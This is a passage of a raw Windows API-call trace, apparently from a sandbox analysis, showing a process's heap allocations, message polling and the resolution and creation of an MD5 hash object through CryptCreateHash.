hHeap=0x970000) returned 1 [0247.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0247.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0247.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0247.418] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0247.418] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0247.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0247.419] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0247.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0247.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0247.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0247.419] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0247.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0247.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.419] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0247.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0247.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0247.419] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0247.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.419] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0247.419] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0247.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0247.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0247.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0247.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0247.419] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0247.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0247.420] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0247.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0247.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0247.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0247.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0247.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0247.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0247.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0247.420] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0247.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0247.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0247.421] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0247.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0247.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0247.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0247.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0247.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0247.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0247.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0247.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0247.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0247.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0247.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0247.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0247.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0247.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0247.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0247.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0247.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0247.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0247.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0247.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0247.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0247.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0247.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0247.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0247.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0247.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0247.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0247.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0247.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0247.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0247.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0247.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0247.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0247.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0247.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0247.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0247.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0247.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0247.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0247.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0247.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0247.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0247.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0247.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0247.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0247.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0247.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0247.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0247.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0247.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0247.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0247.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0247.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0247.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0247.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e515c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0247.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0247.425] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0247.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0247.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0247.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0247.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0247.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0247.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0247.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0247.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0247.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0247.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0247.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0247.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0247.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0247.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0247.425] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0247.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0247.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0247.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0247.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0247.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0247.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0247.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0247.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0247.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0247.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0247.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0247.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0247.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0247.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0247.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0247.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0247.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0247.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0247.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0247.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0247.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0247.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0247.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.427] HeapFree (in: 